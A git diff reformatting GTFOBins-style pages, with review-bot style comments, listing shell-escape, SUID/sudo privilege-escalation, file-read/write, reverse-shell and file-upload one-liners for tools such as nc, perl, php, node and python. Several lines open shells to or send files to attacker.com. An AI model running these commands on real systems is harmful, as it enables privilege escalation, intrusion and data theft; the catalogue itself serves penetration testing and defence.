- ksh -c 'echo data > $LFILE'
+ - code: |
+ export LFILE=file_to_write
+ ksh -c 'echo data > $LFILE'
+ file-read:
+ - description: It trims trailing newlines.
+ code: |
+ export LFILE=file_to_read
+ ksh -c 'echo "$(<$LFILE)"'
+ - description: It trims trailing newlines.
+ code: |
+ export LFILE=file_to_read
+ ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
+ suid-enabled:
+ - code: "./ksh -p"
+ sudo-enabled:
+ - code: sudo ksh
---
diff --git a/_gtfobins/ld.so.md b/_gtfobins/ld.so.md
index b908a97..081ec5a 100644
--- a/_gtfobins/ld.so.md
+++ b/_gtfobins/ld.so.md
@@ -9,9 +9,9 @@ description: |
```
functions:
execute-interactive:
- - code: /lib/ld.so /bin/sh
- sudo-enabled:
- - code: sudo /lib/ld.so /bin/sh
+ - code: "/lib/ld.so /bin/sh"
suid-enabled:
- - code: ./ld.so /bin/sh -p
+ - code: "./ld.so /bin/sh -p"
+ sudo-enabled:
+ - code: sudo /lib/ld.so /bin/sh
---
diff --git a/_gtfobins/less.md b/_gtfobins/less.md
index f8b34ce..d6d9044 100644
--- a/_gtfobins/less.md
+++ b/_gtfobins/less.md
@@ -1,21 +1,22 @@
---
functions:
execute-interactive:
- - code: |
- less /etc/profile
- !/bin/sh
- - code: |
- VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
- v
- sudo-enabled:
- - code: |
- sudo less /etc/profile
- !/bin/sh
- suid-limited:
- - code: |
- ./less /etc/profile
- !/bin/sh
+ - code: |
+ less /etc/profile
+ !/bin/sh
+ - code: |
+ VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
+ v
file-read:
- - code: |
- less file_to_read
+ - code: 'less file_to_read
+
+'
+ sudo-enabled:
+ - code: |
+ sudo less /etc/profile
+ !/bin/sh
+ suid-limited:
+ - code: |
+ ./less /etc/profile
+ !/bin/sh
---
diff --git a/_gtfobins/ltrace.md b/_gtfobins/ltrace.md
index f7b420b..b962133 100644
--- a/_gtfobins/ltrace.md
+++ b/_gtfobins/ltrace.md
@@ -1,7 +1,7 @@
---
functions:
execute-interactive:
- - code: ltrace -b -L /bin/sh
+ - code: ltrace -b -L /bin/sh
sudo-enabled:
- - code: sudo ltrace -b -L /bin/sh
+ - code: sudo ltrace -b -L /bin/sh
---
diff --git a/_gtfobins/mail.md b/_gtfobins/mail.md
index c6f46d1..ec40e5a 100644
--- a/_gtfobins/mail.md
+++ b/_gtfobins/mail.md
@@ -1,17 +1,17 @@
---
functions:
execute-interactive:
- - description: This creates a valid Mbox file which may be required by the binary.
- code: |
- TF=$(mktemp)
- echo "From nobody@localhost $(date)" > $TF
- mail -f $TF
- !/bin/sh
+ - description: This creates a valid Mbox file which may be required by the binary.
+ code: |
+ TF=$(mktemp)
+ echo "From nobody@localhost $(date)" > $TF
+ mail -f $TF
+ !/bin/sh
sudo-enabled:
- - description: This creates a valid Mbox file which may be required by the binary.
- code: |
- TF=$(mktemp)
- echo "From nobody@localhost $(date)" > $TF
- sudo mail -f $TF
- !/bin/sh
+ - description: This creates a valid Mbox file which may be required by the binary.
+ code: |
+ TF=$(mktemp)
+ echo "From nobody@localhost $(date)" > $TF
+ sudo mail -f $TF
+ !/bin/sh
---
diff --git a/_gtfobins/make.md b/_gtfobins/make.md
index ec86fc7..4153bdf 100644
--- a/_gtfobins/make.md
+++ b/_gtfobins/make.md
@@ -5,20 +5,20 @@ description: |
passing the content via stdin using `-f -`.
functions:
execute-interactive:
- - code: |
- COMMAND='/bin/sh'
- make -s --eval=$'x:\n\t-'"$COMMAND"
- sudo-enabled:
- - code: |
- COMMAND='/bin/sh'
- sudo make -s --eval=$'x:\n\t-'"$COMMAND"
- suid-enabled:
- - code: |
- COMMAND='/bin/sh -p'
- ./make -s --eval=$'x:\n\t-'"$COMMAND"
+ - code: |
+ COMMAND='/bin/sh'
+ make -s --eval=$'x:\n\t-'"$COMMAND"
file-write:
- - description: Requires a newer GNU `make` version.
- code: |
- LFILE=file_to_write
- make -s --eval="\$(file >$LFILE,data)" .
+ - description: Requires a newer GNU `make` version.
+ code: |
+ LFILE=file_to_write
+ make -s --eval="\$(file >$LFILE,data)" .
+ suid-enabled:
+ - code: |
+ COMMAND='/bin/sh -p'
+ ./make -s --eval=$'x:\n\t-'"$COMMAND"
+ sudo-enabled:
+ - code: |
+ COMMAND='/bin/sh'
+ sudo make -s --eval=$'x:\n\t-'"$COMMAND"
---
diff --git a/_gtfobins/man.md b/_gtfobins/man.md
index 43814c7..8ccabe2 100644
--- a/_gtfobins/man.md
+++ b/_gtfobins/man.md
@@ -1,18 +1,19 @@
---
functions:
execute-interactive:
- - code: |
- man man
- !/bin/sh
- sudo-enabled:
- - code: |
- sudo man man
- !/bin/sh
- suid-limited:
- - code: |
- ./man man
- !/bin/sh
+ - code: |
+ man man
+ !/bin/sh
file-read:
- - code: |
- man file_to_read
+ - code: 'man file_to_read
+
+'
+ sudo-enabled:
+ - code: |
+ sudo man man
+ !/bin/sh
+ suid-limited:
+ - code: |
+ ./man man
+ !/bin/sh
---
diff --git a/_gtfobins/more.md b/_gtfobins/more.md
index eda72d0..823fa04 100644
--- a/_gtfobins/more.md
+++ b/_gtfobins/more.md
@@ -1,17 +1,17 @@
---
functions:
execute-interactive:
- - code: |
- TERM= more /etc/profile
- !/bin/sh
- sudo-enabled:
- - code: |
- TERM= sudo -E more /etc/profile
- !/bin/sh
- suid-enabled:
- - code: |
- ./more file_to_read
+ - code: |
+ TERM= more /etc/profile
+ !/bin/sh
file-read:
- - code: |
- more file_to_read
+ - code: 'more file_to_read
+
+'
+ suid-enabled:
+ - code: "./more file_to_read\n"
+ sudo-enabled:
+ - code: |
+ TERM= sudo -E more /etc/profile
+ !/bin/sh
---
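Review bot: The `suid-enabled` entry in the new block, `./more file_to_read`, only displays a file, whereas the neighbouring `sudo-enabled` entry and the `suid-*` entries on the other pages in this commit describe obtaining a shell, so the entry looks miscategorised or at least under-described. If reading a file under SUID is what is meant, a short `description` saying so would keep the page consistent with the rest; the inconsistency predates the commit, but the entry is re-emitted here.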
diff --git a/_gtfobins/nano.md b/_gtfobins/nano.md
index f4895e1..d45f451 100644
--- a/_gtfobins/nano.md
+++ b/_gtfobins/nano.md
@@ -1,37 +1,38 @@
---
functions:
execute-non-interactive:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo "$COMMAND" > $TF
- chmod +x $TF
- nano -s $TF /etc/hosts
- ^T
- sudo-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo "$COMMAND" > $TF
- chmod +x $TF
- sudo nano -s $TF /etc/hosts
- ^T
- suid-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
- chmod +x $TF
- ./nano -s $TF /etc/hosts
- ^T
- file-read:
- - code: |
- nano file_to_read
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ nano -s $TF /etc/hosts
+ ^T
file-write:
- - code: |
- nano file_to_write
- ^O
+ - code: |
+ nano file_to_write
+ ^O
+ file-read:
+ - code: 'nano file_to_read
+
+'
+ suid-enabled:
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
+ chmod +x $TF
+ ./nano -s $TF /etc/hosts
+ ^T
+ sudo-enabled:
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ sudo nano -s $TF /etc/hosts
+ ^T
---
diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md
index fc4e27b..b285423 100644
--- a/_gtfobins/nc.md
+++ b/_gtfobins/nc.md
@@ -1,27 +1,29 @@
---
functions:
- upload:
- - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
- code: |
- RHOST=attacker.com
- RPORT=12345
- LFILE=file_to_send
- nc $RHOST $RPORT < "$LFILE"
- download:
- - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
- code: |
- LPORT=12345
- LFILE=file_to_save
- nc -l -p $LPORT > "$LFILE"
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- RHOST=attacker.com
- RPORT=12345
- nc -e /bin/sh $RHOST $RPORT
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ nc -e /bin/sh $RHOST $RPORT
bind-shell-interactive:
- - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
- code: |
- LPORT=12345
- nc -l -p $LPORT -e /bin/sh
+ - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
+ code: |
+ LPORT=12345
+ nc -l -p $LPORT -e /bin/sh
+ upload:
+ - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
+ on the attacker box to collect the file.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_to_send
+ nc $RHOST $RPORT < "$LFILE"
+ download:
+ - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345
+ < "file_to_send"` on the attacker box to send the file.
+ code: |
+ LPORT=12345
+ LFILE=file_to_save
+ nc -l -p $LPORT > "$LFILE"
---
diff --git a/_gtfobins/nl.md b/_gtfobins/nl.md
index f8309cc..4d57bd2 100644
--- a/_gtfobins/nl.md
+++ b/_gtfobins/nl.md
@@ -1,17 +1,19 @@
---
-description: |
- The read file content is corrupted by a leading space added to each line.
+description: 'The read file content is corrupted by a leading space added to each
+ line.
+
+'
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo nl -bn -w1 -s '' $LFILE
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./nl -bn -w1 -s '' $LFILE
file-read:
- - code: |
- LFILE=file_to_read
- nl -bn -w1 -s '' $LFILE
+ - code: |
+ LFILE=file_to_read
+ nl -bn -w1 -s '' $LFILE
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./nl -bn -w1 -s '' $LFILE
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo nl -bn -w1 -s '' $LFILE
---
diff --git a/_gtfobins/node.md b/_gtfobins/node.md
index 9c9aa35..214c045 100644
--- a/_gtfobins/node.md
+++ b/_gtfobins/node.md
@@ -1,33 +1,38 @@
---
functions:
execute-interactive:
- - code: |
- node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
- sudo-enabled:
- - code: |
- sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
- suid-enabled:
- - code: |
- ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
+ - code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});''
+
+'
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- node -e 'sh = require("child_process").spawn("/bin/sh");
- net.connect(process.env.RPORT, process.env.RHOST, function () {
- this.pipe(sh.stdin);
- sh.stdout.pipe(this);
- sh.stderr.pipe(this);
- });'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ node -e 'sh = require("child_process").spawn("/bin/sh");
+ net.connect(process.env.RPORT, process.env.RHOST, function () {
+ this.pipe(sh.stdin);
+ sh.stdout.pipe(this);
+ sh.stderr.pipe(this);
+ });'
bind-shell-interactive:
- - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
- code: |
- export LPORT=12345
- node -e 'sh = require("child_process").spawn("/bin/sh");
- require("net").createServer(function (client) {
- client.pipe(sh.stdin);
- sh.stdout.pipe(client);
- sh.stderr.pipe(client);
- }).listen(process.env.LPORT);'
+ - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
+ code: |
+ export LPORT=12345
+ node -e 'sh = require("child_process").spawn("/bin/sh");
+ require("net").createServer(function (client) {
+ client.pipe(sh.stdin);
+ sh.stdout.pipe(client);
+ sh.stderr.pipe(client);
+ }).listen(process.env.LPORT);'
+ suid-enabled:
+ - code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0,
+ 1, 2]});''
+
+'
+ sudo-enabled:
+ - code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1,
+ 2]});''
+
+'
---
diff --git a/_gtfobins/od.md b/_gtfobins/od.md
index 4cf623b..8644d85 100644
--- a/_gtfobins/od.md
+++ b/_gtfobins/od.md
@@ -3,16 +3,16 @@ description: |
Three spaces are added before each character in the read file, and
non-printable chars are printed as backslash escape sequences.
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo od -An -c -w9999 "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./od -An -c -w9999 "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- od -An -c -w9999 "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ od -An -c -w9999 "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./od -An -c -w9999 "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo od -An -c -w9999 "$LFILE"
---
diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md
index c423a7f..f781b65 100644
--- a/_gtfobins/perl.md
+++ b/_gtfobins/perl.md
@@ -1,15 +1,15 @@
---
functions:
execute-interactive:
- - code: perl -e 'exec "/bin/sh";'
- sudo-enabled:
- - code: sudo perl -e 'exec "/bin/sh";'
- suid-enabled:
- - code: ./perl -e 'exec "/bin/sh";'
+ - code: perl -e 'exec "/bin/sh";'
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+ suid-enabled:
+ - code: ./perl -e 'exec "/bin/sh";'
+ sudo-enabled:
+ - code: sudo perl -e 'exec "/bin/sh";'
---
diff --git a/_gtfobins/php.md b/_gtfobins/php.md
index 944ba2a..ca9e4ea 100644
--- a/_gtfobins/php.md
+++ b/_gtfobins/php.md
@@ -17,33 +17,34 @@ functions:
export CMD="/bin/sh"
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
execute-non-interactive:
- - code: |
- export CMD="id"
- php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
- sudo-enabled:
- - code: |
- CMD="/bin/sh"
- sudo php -r "system('$CMD');"
- suid-enabled:
- - code: |
- CMD="/bin/sh"
- ./php -r "system('$CMD');"
- upload:
- - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
- code: |
- LHOST=0.0.0.0
- LPORT=8888
- php -S $LHOST:$LPORT
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export URL=http://attacker.com/file_to_get
- export LFILE=file_to_save
- php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
+ - code: |
+ export CMD="id"
+ php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
+ upload:
+ - description: Serve files in the local folder running an HTTP server. This requires
+ PHP version 5.4 or later.
+ code: |
+ LHOST=0.0.0.0
+ LPORT=8888
+ php -S $LHOST:$LPORT
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
+ suid-enabled:
+ - code: |
+ CMD="/bin/sh"
+ ./php -r "system('$CMD');"
+ sudo-enabled:
+ - code: |
+ CMD="/bin/sh"
+ sudo php -r "system('$CMD');"
---
diff --git a/_gtfobins/pico.md b/_gtfobins/pico.md
index 24c9ff4..c64f482 100644
--- a/_gtfobins/pico.md
+++ b/_gtfobins/pico.md
@@ -1,37 +1,38 @@
---
functions:
execute-non-interactive:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo "$COMMAND" > $TF
- chmod +x $TF
- pico -s $TF /etc/hosts
- ^T
- sudo-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo "$COMMAND" > $TF
- chmod +x $TF
- sudo pico -s $TF /etc/hosts
- ^T
- suid-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
- chmod +x $TF
- ./pico -s $TF /etc/hosts
- ^T
- file-read:
- - code: |
- pico file_to_read
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ pico -s $TF /etc/hosts
+ ^T
file-write:
- - code: |
- pico file_to_write
- ^O
+ - code: |
+ pico file_to_write
+ ^O
+ file-read:
+ - code: 'pico file_to_read
+
+'
+ suid-enabled:
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
+ chmod +x $TF
+ ./pico -s $TF /etc/hosts
+ ^T
+ sudo-enabled:
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ sudo pico -s $TF /etc/hosts
+ ^T
---
diff --git a/_gtfobins/puppet.md b/_gtfobins/puppet.md
index de2c5ef..a4ae2d9 100644
--- a/_gtfobins/puppet.md
+++ b/_gtfobins/puppet.md
@@ -1,23 +1,24 @@
---
functions:
execute-non-interactive:
- - description: The executed command output shown in the puppet log format.
- code: |
- export CMD="/usr/bin/id"
- puppet apply -e "exec { '$CMD': logoutput => true }"
- sudo-enabled:
- - description: The executed command output shown in the puppet log format.
- code: |
- export CMD="/usr/bin/id"
- sudo puppet apply -e "exec { '$CMD': logoutput => true }"
- file-read:
- - description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
- code: |
- export LFILE=file_to_read
- puppet filebucket -l diff /dev/null $LFILE
+ - description: The executed command output shown in the puppet log format.
+ code: |
+ export CMD="/usr/bin/id"
+ puppet apply -e "exec { '$CMD': logoutput => true }"
file-write:
- - description: The file path must be absolute.
- code: |
- export LFILE="/tmp/file_to_write"
- puppet apply -e "file { '$LFILE': content => 'data' }"
+ - description: The file path must be absolute.
+ code: |
+ export LFILE="/tmp/file_to_write"
+ puppet apply -e "file { '$LFILE': content => 'data' }"
+ file-read:
+ - description: The read file content is corrupted by the `diff` output format. The
+ actual `/usr/bin/diff` command is executed.
+ code: |
+ export LFILE=file_to_read
+ puppet filebucket -l diff /dev/null $LFILE
+ sudo-enabled:
+ - description: The executed command output shown in the puppet log format.
+ code: |
+ export CMD="/usr/bin/id"
+ sudo puppet apply -e "exec { '$CMD': logoutput => true }"
---
diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md
index ea943c0..f2cce96 100644
--- a/_gtfobins/python2.md
+++ b/_gtfobins/python2.md
@@ -1,37 +1,39 @@
---
functions:
execute-interactive:
- - code: python2 -c 'import os; os.system("/bin/sh")'
- sudo-enabled:
- - code: sudo python2 -c 'import os; os.system("/bin/sh")'
- suid-enabled:
- - code: ./python2 -c 'import os; os.system("/bin/sh -p")'
- upload:
- - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- export URL=http://attacker.com/
- export LFILE=file_to_send
- python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
- - description: Serve files in the local folder running an HTTP server.
- code: |
- export LPORT=8888
- python2 -m SimpleHTTPServer $LPORT
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export URL=http://attacker.com/file_to_get
- export LFILE=file_to_save
- python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
+ - code: python2 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive:
- - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345
on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
- file-read:
- - code: python2 -c 'open("file_to_read").read()'
+ - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345
on
+ the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
+ upload:
+ - description: Send local file via "d" parameter of a HTTP POST request. Run an
+ HTTP service on the attacker box to collect the file.
+ code: |
+ export URL=http://attacker.com/
+ export LFILE=file_to_send
+ python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
+ - description: Serve files in the local folder running an HTTP server.
+ code: |
+ export LPORT=8888
+ python2 -m SimpleHTTPServer $LPORT
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
file-write:
- - code: python2 -c 'open("file_to_write","w+").write("data")'
+ - code: python2 -c 'open("file_to_write","w+").write("data")'
+ file-read:
+ - code: python2 -c 'open("file_to_read").read()'
load-library:
- - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
+ - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
+ suid-enabled:
+ - code: ./python2 -c 'import os; os.system("/bin/sh -p")'
+ sudo-enabled:
+ - code: sudo python2 -c 'import os; os.system("/bin/sh")'
---
diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md
index 9796842..719151a 100644
--- a/_gtfobins/python3.md
+++ b/_gtfobins/python3.md
@@ -1,37 +1,39 @@
---
functions:
execute-interactive:
- - code: python3 -c 'import os; os.system("/bin/sh")'
- sudo-enabled:
- - code: sudo python3 -c 'import os; os.system("/bin/sh")'
- suid-enabled:
- - code: ./python3 -c 'import os; os.system("/bin/sh -p")'
- upload:
- - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- export URL=http://attacker.com/
- export LFILE=file_to_send
- python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
- - description: Serve files in the local folder running an HTTP server.
- code: |
- LPORT=8888
- python3 -m http.server $LPORT
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export URL=http://attacker.com/file_to_get
- export LFILE=file_to_save
- python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
+ - code: python3 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive:
- - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345
on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
- file-read:
- - code: python3 -c 'open("file_to_read").read()'
+ - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345
on
+ the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
+ upload:
+ - description: Send local file via "d" parameter of a HTTP POST request. Run an
+ HTTP service on the attacker box to collect the file.
+ code: |
+ export URL=http://attacker.com/
+ export LFILE=file_to_send
+ python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
+ - description: Serve files in the local folder running an HTTP server.
+ code: |
+ LPORT=8888
+ python3 -m http.server $LPORT
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
file-write:
- - code: python3 -c 'open("file_to_write","w+").write("data")'
+ - code: python3 -c 'open("file_to_write","w+").write("data")'
+ file-read:
+ - code: python3 -c 'open("file_to_read").read()'
load-library:
- - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
+ - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
+ suid-enabled:
+ - code: ./python3 -c 'import os; os.system("/bin/sh -p")'
+ sudo-enabled:
+ - code: sudo python3 -c 'import os; os.system("/bin/sh")'
---
diff --git a/_gtfobins/rlwrap.md b/_gtfobins/rlwrap.md
index 65c1639..254f12d 100644
--- a/_gtfobins/rlwrap.md
+++ b/_gtfobins/rlwrap.md
@@ -1,14 +1,15 @@
---
functions:
execute-interactive:
- - code: rlwrap /bin/sh
- sudo-enabled:
- - code: sudo rlwrap /bin/sh
- suid-enabled:
- - code: ./rlwrap -H /dev/null /bin/sh -p
+ - code: rlwrap /bin/sh
file-write:
- - description: This adds timestamps to the output file. This relies on the external `echo` command.
- code: |
- LFILE=file_to_write
- rlwrap -l "$LFILE" echo data
+ - description: This adds timestamps to the output file. This relies on the external
+ `echo` command.
+ code: |
+ LFILE=file_to_write
+ rlwrap -l "$LFILE" echo data
+ suid-enabled:
+ - code: "./rlwrap -H /dev/null /bin/sh -p"
+ sudo-enabled:
+ - code: sudo rlwrap /bin/sh
---
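Review bot: The `suid-enabled` command is now emitted as `"./rlwrap -H /dev/null /bin/sh -p"` while the equivalent `./perl`, `./rpm` and `./python2` entries in this same commit stay plain, so the dumper's quoting decision is leaking into the files as inconsistent style; a value beginning with `./` needs no quoting in YAML. The same applies to setarch.md (`"./setarch $(arch) /bin/sh -p"`) and sqlite3.md (`"./sqlite3 /dev/null '.shell /bin/sh'"`). Drop the double quotes, or quote every such entry the same way, so the front matter follows one convention.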
diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md
index 67d2f53..268c69f 100644
--- a/_gtfobins/rpm.md
+++ b/_gtfobins/rpm.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
- sudo-enabled:
- - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
+ - code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
- - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
+ - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
+ sudo-enabled:
+ - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
---
diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md
index 5d9eee1..ce85849 100644
--- a/_gtfobins/rpmquery.md
+++ b/_gtfobins/rpmquery.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
- sudo-enabled:
